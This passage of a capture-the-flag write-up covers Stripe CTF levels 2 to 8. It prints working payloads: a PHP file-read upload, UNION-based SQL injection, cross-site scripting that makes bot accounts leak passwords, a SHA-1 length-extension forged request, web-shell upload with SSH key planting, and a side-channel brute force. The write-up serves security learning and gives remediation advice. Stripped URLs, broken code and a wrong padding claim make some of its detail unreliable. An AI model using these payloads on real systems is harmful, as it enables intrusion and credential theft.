<?php echo file_get_contents(“../password.txt”);

Now you can navigate directly to /uploads/x.php and view your newly, and easily, acquired flag for submission. This Level 2 Challenge illustrates that, as a developer, you always want to validate your input. If you are only expecting images (jpg, png, gif, etc.), be sure to employ several test cases that properly validate that these files are the only files possible to upload. Also, be mindful that just because an extension ends in .jpg doesn’t mean it’s an actual .jpg file.

Looking Ahead: File upload abuse can cause a world of problems. It’s so severe that you’ll be using it to exploit the Level 8 Challenge.

Level 3: The (still not so) Secret Safe v2.0

Vulnerability: SQL Injection

After the fiasco in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution − kind of like Unbreakable Linux. The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.

A beta version has launched with some interesting secrets − including the password to access Level 4; you can see the password at

“Bob” has your flag in Level 3, and the flag is his password. As a simple blind SQL test, you can attempt to log in with username=’&password=’. The resulting page will be an error page complaining that you’ve provided invalid syntax. This is “music to a any penetration testers delicate ears.” Inspect lines 86-87 and you’ll encounter a query that is not using prepared statements.

query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username)

Lines 95-97 reveal another interesting detail: They expose that the supplied password is first salted (realuserpassword+randomcharacters); then has SHA256 encryption applied. This is then converted to HEX and compared to a previously stored database version of the users encrypted password.

calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
return "That's not the password for {0}!\n".format(username)

You want the password for bob, so all you need to do is satisfy the query that it is getting what it’s expecting, and then provide a conditional that is always true where username = bob. You will also need to supply an id, a SHA256 representation of any string, a salt (which can be an empty string), and then a query that simply selects bob, followed by commenting out the rest of the SQL syntax.

We can retrieve bob’s password by supplying the following POST request:

username=' UNION SELECT id, '37268335dd6931045bdcdf92623ff819a64244b53d0e746d438797349d4da578', 'test' FROM users where username='bob' --&password=test

Hello, pretty Flag No. 3. If only the developer had escaped the input, this vulnerability could have been prevented. And, now, on the following page you are returned the following message:

Welcome back! Your secret is: “The password to access level04 is: TzukOHMEmW”

Level 4: The Karma Trader Vulnerability: Cross-Site Scripting

The Karma Trader is the world’s best way to reward people for good deeds:https:// You can sign up for an account, and start transferring karma to people who you think are doing good for the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The very active user karma_fountain has infinite karma, making it a ripe account to obtain. After all, no one will notice a few extra karma trades here and there. The password for karma_fountain‘s account will give you access to Level 5.

In this application, the currency Karma is gifted to other users. To ensure that it is traded legally, Alice shows Bob her password when Alice gives Bob any Karma. With this methodology, only “good” people will be gifted Karma. There is a JavaScript-driven bot named karma_fountain that periodically logs in, but does nothing other than the login. On the bottom of the karma_fountain page all users in the system are listed, along with a timestamp of when they were last active. karma_fountain’s password is your flag, and it’s immediately apparent that you want karma_fountain to give you Karma, which will expose the level 5 flag to you. However, karma_fountain simply just logs on, and then logs off.

Because karma_fountain has his own session, you can expose an injection to him by supplying the injection to your own password, followed by giving karma_fountain some Karma. Upon logging in and checking his own Karma, our password/injection will be rendered on the karma_fountain page, which forces a request from karma_fountain to a user of your choosing. In the following injection (modified for readability), karma_fountain is forced to send a POST request that sends 5 Karma to the user “winner”:

var xhr = new XMLHttpRequest();"POST", '', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

After supplying the injection, you only need to wait for Karma_Trader to log in. Several minutes of page-refreshing later, karma_fountain logs in and his password is displayed to us:

karma_fountain (password: yQNQNLM1gG , last active 03:40:04 UTC)

Thus, Cross-Site Scripting is made possible by a combination of two situations: Improper input validation, and the absence of output encoding. In the above situation, the only input not being validated is the password field. Proper XSS remediation techniques can be found at the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet.

Level 5: The Stripe CTF Domain Authenticator

Vulnerability: Insufficient Authentication

Many attempts have been made at creating a federated identity system for the Web (see OpenID, for example). However, none of them have been successful. Until today.

The DomainAuthenticator is based on a novel protocol for establishing identities. To authenticate to a site, you simply provide its username, password, and pingback URL. The site then posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain.

You can check out the Stripe CTF DomainAuthenticator instance here: You can use it to distribute the password to access Level 6. Now, if only you could somehow authenticate yourself as a user of a level05 machine…

To avoid nefarious exploits, the machine hosting the DomainAuthenticator’s network access is very locked down, allowing it to make only outbound requests to servers. However, say you’ve heard that someone forgot to internally firewall the high ports from the Level 02 server…

Given that knowledge, you now need to provide a username and password, as well as a pingback URL that outputs AUTHENTICATED − indicated by line 107-109.  The regex also specifies that AUTHENTICATED must start and end with a word character.

body =~ /[^\w]AUTHENTICATED[^\w]*$/

However, the pingback URL will be accepted only if it is hosted on

ALLOWED_HOSTS = /\.stripe-ctf\.com$/

Hmmm…. So, you need to reference a file and it can only come from The convenient and vulnerable level02 server with the Abuse of Functionality File Upload comes to mind, except it is not in KNOWN_HOSTS on line 55. Because it’s not recognized, the script will not show you the password if you just blatantly reference the file that contains the ” AUTHENTICATED ” output.

PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/

Or can you? The code might be a bit misleading, but technically, if you upload a file containing the contents ” AUTHENTICATED ” to the level02 server, and place the URL to that file as a value to the pingback parameter, the following steps will occur:

  1. Application sends a pingback to the level05 server asking if you’re authenticated.
  2. The level05 server then chains this pingback to the level02 server, gets its response, and supplies that response as input coming back to the level05 server’s Web application.
  3. Because the level02 server responded with the response ‘ Authenticated ‘, the level05 server responds with the authenticated output.

Again, in this situation, no user input was validated. The developers did not anticipate that a user might recursively chain URLs. Therefore, wherever a user can supply input, the application must have checks in place that validate that the input is trusted and expected. Only then should the input be accepted.

Level 6: The Streamer

Vulnerability: Cross-Site Scripting

After Karma Trader, from Level 04, was hit with massive karma inflation − purportedly due to someone flooding the market with massive quantities of karma − the site closed its doors. All hope was not lost, however, because the technology was acquired by a real up-and-comer, Streamer. Streamer self-proclaims itself as the most streamlined way of sharing updates with your friends. You can access your Streamer instance here:

Streamer’s engineers, realizing that security holes led to the demise of Karma Trader, greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 07, level07-password-holder, is the first Streamer user.

Furthermore, the level07-password-holder is taking a lot of precautions: His or her computer has no network access other than the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and similar complexities.

Level 7 seemed to stump a lot of people, but wasn’t that difficult for me. In fact, the challenge was lots of fun. The main problem I had was learning a bit of jQuery to solve this problem. The trick here, very similar to the Level 4 challenge, was to force the level07-password-holder to unwillingly post the password. Below is a screenshot of the post functionality that you get to exploit in this application.

When you click on your name, a request is made to /user_info that shows your username and password:

Also, when attempting to make a post to the Streamer, the following POST body is sent:


Several people seemed to get stuck at this point because they saw a CSRF token. This is a very effective defense at stopping someone from forging a fake request and then tricking another user into submitting the request. However, if a Cross-Site Scripting vulnerability is present, CSRF is very easily circumvented. By testing a post with a simple injection <script>alert(1)</script> to see the behavior, the streamer breaks and the functionality disappears. Instead, only bits and pieces of broken code appear.

Let’s examine this error in greater detail, because it’s fundamental in getting the injection you’ll need to work.

All right, something went wrong. Let’s take a look at the DOM environment and see what happened:

<script>var username = "testing";
var post_data = [{"time":"Tue Aug 28 05:14:19 +0000 2012","title":"testing","user":"testing",
"id":null,"body":"testing"},{"time":"Tue Aug 28 05:14:20 +0000 2012","title":"testing",
"user":"testing","id":null,"body":"testing"},{"time":"Tue Aug 28 05:14:20 +0000 2012",
{"time":"Tue Aug 28 05:23:45 +0000 2012","title":"testing","user":"testing","id":null,
"body":"testing"},{"time":"Tue Aug 28 05:23:45 +0000 2012","title":"testing","user":"testing",
function escapeHTML(val) {return $('<div>').text(val).html();}function addPost(item)
{var new_element = '' + escapeHTML(item['user']) +'<h4>' + escapeHTML(item['title']) + '</h4>'
+escapeHTML(item['body']) + '';$('#posts &gt; tbody:last').prepend(new_element);}
for(var i = 0; i &lt; post_data.length; i++) {var item = post_data[i];addPost(item);};

It appears the Streamer’s functionality was broken by preemptively ending the script tag, causing all of the text past our </script> tag to be displayed. This can be easily remedied by starting our injection with a closed script tag, opening it back up, inserting the payload, closing it off again; and then opening it back up. Your injection will now live in the inner script tags, whereas the outer script tags will be used to repair the damage you’ve done to the Streamers’ posting functionality.

</script><script> Malicious payload will go here </script><script>

It’s also worth noting that upon testing an injection with </script><script>alert(‘XSS’)</script><script>, the injection didn’t fire because there is a bit of filtering going on with the input. It appears the application is rejecting any input that contains (‘) and (“).

So you need to do two additional things to get this injection to work. First, you’ll need to make a request to the page /user_info to retrieve the password. Secondly, you’ll need to get the level07-password-holder to post the /user_info response. You can accomplish all this by using the following injection, separated with a statement on each line for readability:

title:'x',body: data,_csrf:document.getElementsByName('_csrf')[0].value});

Awesome! You now have an injection that will work. However, there remains one pretty big underlying problem to overcome. Remember the rejection of input containing (‘) and (“)? Those characters are in our injection, and the level07-password-holder also has them in his or her password. Not only will this prevent the above injection from being accepted, but this situation will not allow the full password to be returned – and even if you could strip (‘) and (“) in the /get_info response, that would be counter-intuitive as you would not receive the full password.

“As well, level07-password-holder is taking a lot of precautions: His or her computer has no network access other than the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.”

The way you can overcome these precautions is to use some simple filter evasion techniques. With JavaScript, there’s a seemingly infinite number of ways to do this, limited only by an attacker’s own ingenuity. One nifty trick that you can employ for this little quote fiasco is to replace title:’x’ and document.getElementsByName(‘_csrf’) with title:/x/.source and document.getElementsByName(/_csrf/.source). However, you can’t do the same thing for ‘/user_info’ and ‘/user-irnpeljyje/posts’, because of the leading / character. An error would occur with this method if you attempted //user_info/.source and //user-irnpeljyje/posts/.source. The way to bypass that problem is to convert each character to unicode, and place those characters in a String.fromCharCode().

Now you have one last obstacle to overcome, which is the level07-password-holder having (‘) and (“) in the password. The current technique for accessing this password is to take the full HTML response from your GET request to /user_info and storing it in the variable data. In order to prevent your forced post from being rejected, you can use the escape() function to encode every character in that source. Your final injection will then be the following:

$.get(String.fromCharCode(117, 115, 101, 114, 95, 105, 110, 102, 111),
$.post(String.fromCharCode(47, 117, 115, 101, 114, 45, 105, 114, 110, 112, 101, 108, 106, 121, 106, 101, 47, 112, 111, 115, 116, 115),{
title:/x/.source,body: escape(data),_csrf:document.getElementsByName(/_csrf/.source)[0].value});

One last interesting note is that the Streamer’s functionality will show only the most recent 5 posts. This injection will cause all persons requesting the page to inadvertently post their passwords, including your own! The level07-password-holder account behaves exactly like the karma_fountain account from level 4, in the sense that it will sporadically log on and off. The exception here is that level07-password-holder likes to taunt you with posts like, “Are you feeling hungry for a sandwich?” or “I have a new good book for you to read.”

Well, you can show him who’s in charge. After posting the injection, logging off, waiting about 5 minutes (sandwich sounds really good right about now, thanks level07-password-holder), and then logging back in, you get to see that your friend has posted his or her own password. Oops? =)

Now that you have the response of the password page for the level07-password-holder, all that’s left to do is decode the post and extract the part that you want – take a close look at lines 3 and 4 from the bottom of the above image. You’ve Conquered Level 6, so just two more Challenges to go!


Level 7: Waffle Thievery

Vulnerability: Insufficient Authorization along with weak cryptography implementation

Welcome to the penultimate level, Level 7.

WaffleCopter is a new service that delivers locally sourced organic waffles coming hot off vintage waffle irons, and straight onto your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested as a private beta model in select locations.

Your goal is to order one of the decadent Liège Waffles, which is offered only to WaffleCopter’s first premium subscribers.

Log in to your account at with username ctf and password being password. You will find your API credentials after logging in.

This is by far the most intriguing challenge of the CTF. While the straightforward goal is to order the magnificent Liege Waffle, it’s soon very clear that you are not as special as other people in this world, and that you lack the premium status required to order a Liege Waffle. Thankfully, hackers don’t need premium status to order premium “things.”

Upon logging in, the following information is presented:

Your API credentials

  • endpoint:
  • user_id: 5
  • secret: 9tjDFCx5FNgqjD

Available waffles

  • liege (premium)
  • dream (premium)
  • veritaffle
  • chicken (premium)
  • belgian
  • brussels
  • eggo

And that’s all. There’s a link to API Request Logs at /logs/5, but it doesn’t show anything. However, your user_id is also 5, so what are the odds that you can force browse to /logs/1, and then see user_id:1’s API Request Logs? Yes. Bingo!

API Request Logs




2012-08-22 10:32:08



2012-08-22 10:32:08



If you try to repeat this POST request to /orders, but change waffle=liege, you get the message “that waffle requires a premium subscription.” Consequently, if you provide user_id = 1 (we know he’s a premium user, because he’s ordered a chicken waffle) you receive the message “signature check failed.”

What this tells you is that some sort of authentication is validating the source of the order. Every user has a secret key that is used to sign a request and create a signature. The server then verifies this signature, and either accepts or rejects the request based on the validity of the signature.

Here’s a definition in that shows what’s going on in the signature verification process:

def verify_signature(user_id, sig, raw_params):
# get secret token for user_id
row = g.db.select_one(‘users’, {‘id': user_id})
except db.NotFound:
raise BadSignature(‘no such user_id’)
secret = str(row[‘secret’])

h = hashlib.sha1()
h.update(secret + raw_params)
print ‘computed signature’, h.hexdigest(), ‘for body’, repr(raw_params)
if h.hexdigest() != sig:
raise BadSignature(‘signature does not match’)
return True

Let’s analyze this definition.

First, the cryptographic function being performed is SHA-1. SHA-1 is a mathematical cryptographic process known to be vulnerable, and although it provides a decent layer of protection, it’s crackable. In this code, the user’s secret is pulled from the database, a SHA1(secret + raw_params) is created, and that secret is then compared against the signature sent in the same request. If the signatures are identical, the request is accepted; otherwise, it’s rejected.

So… What’s there to exploit? Well, SHA-1 itself, when you understand how it works.

The Hash Length Extension Attack

One iteration within the SHA-1 compression function:
A, B, C, D and E are 32-bit words of the state;
F is a nonlinear function that varies;
n denotes a left bit rotation by n places;
n varies for each operation;
Wt is the expanded message word of round t;
Kt is the round constant of round t;
block denotes addition modulo 2^32.

Hash algorithms, such as SHA1(Secure Hash Algorithm), are finite state machines operating on a fixed-size block of input that’s successively reduced to the current internal state. The implementation of SHA applies a hashing function to both the currently active internal state and the current block, which results in the next internal state. What this tells you is that the input, at any moment of time, is always in the current internal state.

In order to exploit this situation, you’ll need to implement your own variation of the SHA1 Algorithm that extends the hash. This process can be done by placing the internal state at the end of the input, and then adding more blocks of input. If you remember the /orders POST requests from above, you’ll see they have given us signatures. You also know that the length of the secret key is 14, and with this information, you can generate the proper amount of padding.

For SHA1, when the input is not an exact multiple of the block size, the input gets padded in the background until it is 20 bytes. With this added padding, you end up with a signature from SHA1(secret, paddingOf(secret), message), where the message and the paddingOf(secret) that you supply is the padding added to the message in the original computation. Of course, for you to generate the paddingOf(secret), you must know the length of the secret (which you do know).

If you suppose that SHA1(secret) is a hash signature, and secret is actually a keyed hash; and if you know the length of secret, you can create the SHA1 hash signature of (plaintext + paddingOf(secret) + whateverWeWantHere) without knowing the secret key. You already know a valid plaintext request, and if you assume that all users on the system have the same key length that you were given when first visiting the application, you can generate the padding required. This was done with the “” script located here.

What you want to do here is take a request that you are able to make with your account, and then append the padding and new message. This will give you something similar to the following:

count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x02&waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd

 The \x00’s are ASCII representations of null bytes; in fact, it’s a specific byte value of HEX 0. Some of the information actually gets lost when printing the byte value, so you’ll need to submit the request with a Python script (otherwise, you’ll be sending strings of null bytes, instead of actual null bytes, if you tried to send the request as POST data through a browser).

After completing this challenge I recently learned that you can use some intercepting proxies to send decoded null bytes, but I had not known that at the time of tackling this problem.

Upon acceptance of the signature from your hash extended request, you’ll be given the flag that gives provides access to the final challenge.

In this challenge, the developer should have used Hash-based message authentication codeinstead of a straightforward SHA1 implementation. Without the information leakage of the signature or the insufficient authorization(force browsing to logs/1) − which is obviously not on your account, and also would have prevented you from seeing a valid signature − it would have been much more difficult to order the liege waffle.

Level 8: Cracking the Code

Vulnerabilities: Information Leakage, Brute Force

Welcome to the final level, Level 8.

HINT 1: No, really, you’re not looking for a timing attack.

HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?

UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag will NOT change.

Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accessible at

PasswordDB exposes a simple JSON API. You just POST a payload of the form {“password”: “password-to-check”, “webhooks”: [“″, …]} to PasswordDB, which will respond with a{“success”: true}” or {“success”: false}” to you and your specified webhook endpoints.

(For example, try running curl -d ‘{“password”: “password-to-check”, “webhooks”: []}’.)

In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or they may live on a different machine for added security. PasswordDB comes with built-in security features, such as timing attack prevention, and protection against using inequitable amounts of CPU time − relative to other PasswordDB instances on the same machine.

For maximum security, the machine hosting the primary server has “Locked Down” network access. The server can make only outbound requests to other servers. However, as you learned in Level 5, someone forgot to firewall off the high ports internally from the Level 2 server. It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.

To maximize adoption, easy usability is also a goal of PasswordDB. Hence, a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. This script validates that your password looks like a valid Flag, automatically spinning up 4 chunk servers and a primary server.

 All I can say for this challenge is “Wow!” What a beast. Solving Level 8 took more than twice as long as challenges 0 through 7.

The Level 8 situation is as follows:

The level08 server starts a database that contains a random 12-digit password that contains only numbers. Four “chunk” servers are then created and each chunk is given 3 digits of the password.

John-Kuskos:level08-code johnathankuskos$ ./password_db_launcher 111222333444
Split length 12 password into 4 chunks of size about 3: ['111', '222', '333', '444']
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Launched ['./chunk_server', '', '111'] (pid 87332)
Launched ['./chunk_server', '', '222'] (pid 87333)
Launched ['./chunk_server', '', '333'] (pid 87334)
Launched ['./chunk_server', '', '444'] (pid 87335)
Checking whether is reachable
Condition not yet true, waiting 0.35 seconds (try 1/10)
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Launched ['./primary_server', '-l', '/tmp/primary.lock', '-c', '', '-c', '', '-c'

After running this local copy of the database, you will observe that the application outputs a single JSON string to the user, based on whether a correct or incorrect 12-digit key was submitted, either {“success”: false} or {“success”: true}. To evaluate this response, the server will first break up your submitted 12-digit password into 4 chunks (if password is 111222333444, chunk1 would check 111, chunk2 would check 222, etc.), and then check the first chunk. If the chunk1 server evaluated the supplied chunk as correct, the flow of logic would continue to the chunk2 server, and it would then test for truth; if true, then the chunk3 server would check for truth, until finally, if all three chunks were true, the final chunk server would check if its own chunk were true.

However, if the first chunk server fails its test, chunk servers 2, 3, and 4 would never be evaluated, and the user would be returned a single {“success”: false}. The same situation also occurs when the first chunk and second chunks are correct, but the third chunk is incorrect, causing the chunk4 server to never evaluate its chunk. It’s also possible to instruct the chunk servers to send their output to a webhook, if one is created:

[] Received payload: '{"password": "000000000000", "webhooks": []}'
Acquiring lock
[] Split length 12 password into 4 chunks of size about 3: [u'000', u'000', u'000', u'000']
[] Making request to chunk server ('', 2163) (remaining chunk servers: [('', 2164), ('', 2165), ('', 2166)])
[] Received payload: '{"password_chunk": "000"}'
[] Request already finished!
[] Responding with: '{"success": false}\n'
[] Going to wait 0.00488090515137 seconds before responding
[] Request already finished!
[] Responding with: '{"success": false}\n'
Releasing lock

Sadly, and serving as another brick wall, the level08 server is inaccessible to outside connections. There is absolutely no way for you to access it externally. However, the level08 server can talk to any of the other CTF servers. Remember our friend, the ever-so vulnerable level02 server?

Cracking the Code

Step 1. Obtaining a shell on level02

You already know that the level02 server has ssh capabilities. Because you can run php on the level02 server, you can test for command-line access. You can run the Ajax/PHP Command Shell − it’s quite popular and has great practical use in this step − from ( Once Ajax/PHP Command Shell is uploaded, you can use the browser as an interactive terminal from the level02 server.

Step 2. Obtaining SSH access

After obtaining command line access, it will be as simple as creating ssh public/private pair keys and uploading the public key to the level02 server. After placing the public key in the correct directory (/mount/home/user-abcdefghij/.ssh/) and chmod’ing it to 600, you can get in with the command ssh

Step 3. Analysis

Before you can start attacking, you need to figure out how the database actually works. On the local copy of the database, I previously wrote a listener in Python that would get the callbacks from the password request checks. What you will notice is that for the first chunk(testing password 000xxxxxxxxx through 999xxxxxxxxx), the ports coming back to the listener from the chunk servers will increment by 3 if the chunk submitted was a false chunk. If the trunk is true, it will increment by 4. You then supply a correct first chunk, and a test second chunk. Assuming the first correct chunk is 123, you’re now testing the password 123000xxxxxx through 123999xxxxxx. False test chunks for chunk 2 will result in an increment of 4, and the positive chunk will increment by 5. The same situation will occur for the third chunk, a false submission will increment by 5, and a true submission will increment by 6. For the final chunk, you will just run all 4 chunks against the level08 server and watch for a {“success”: false} or {“success”: true}. If a true is encountered, you will then have your flag.

Step 4. Cracking the Code

With the methodology in place − and probably at least 2 days spent learning and implementing a 350-line script in Python ­− the brute forcing script would take approximately 5 to 25 minutes to crack the 12-digit code, depending on the randomness of the chunks and the network traffic.

For instance, network traffic on the production servers differed heavily from WhiteHat’s local copy. In fact, we encountered a third test case, neither true nor false − but inconclusive − that we’ll need to retest. What we’ll do is send one request, get back its response, and then − before sending a second request – from 3 to 20 other hackers participating in the challenge will have sent their requests. This activity will result in a port difference between approximately 7 and 200 − depending on network traffic, with higher traffic equaling higher difference.

 Because we could not rule out any difference based on that value, we kept every iteration in a loop that would constantly evaluate the value, until it was either ruled out by encountering our condition for a false chunk, or matching our condition for a potential true chunk at least 10 times. At the 10th iteration of possibly being true, we would accept it as highly likely to be a true chunk, and then move on to the next chunk. The entire brute forcing output we used can be found here, along with the script that generated it here. The following output is from the end of our brute force solution:

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "true"}

Flag Found: 204771432466

Solve time ~ 1767.952389 seconds

The brute forcing approach was only possible because of the info leak provided from the chunk servers. Although this approach was probably the intended method for completing the competition, in the real world we all too often encounter responses from servers that are too detailed. That is, when you let users know where information is originating, they know exactly where to focus their attacks.


This CTF was intense and sparked a new interest in exploitation for me. I can’t wait to participate in the next one.

Anything for a free t-shirt, right?



During the challenge, I did heavy research on Python, jQuery, and encryption in order to solve the challenges. Listed below are references that were very helpful to me:

“The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards and even then I have my doubts.”
~Dr. Eugene Spafford, Purdue University

Special thanks to Stripe, Inc.
The text above that appears in the brown italic font indicates that the description of each of the 8 Levels comes directly from the Stripe website. I used this procedure in order to ensure that I accurately depicted this CTF as Stripe originally intended, and Stripe has granted permission for the use of the text.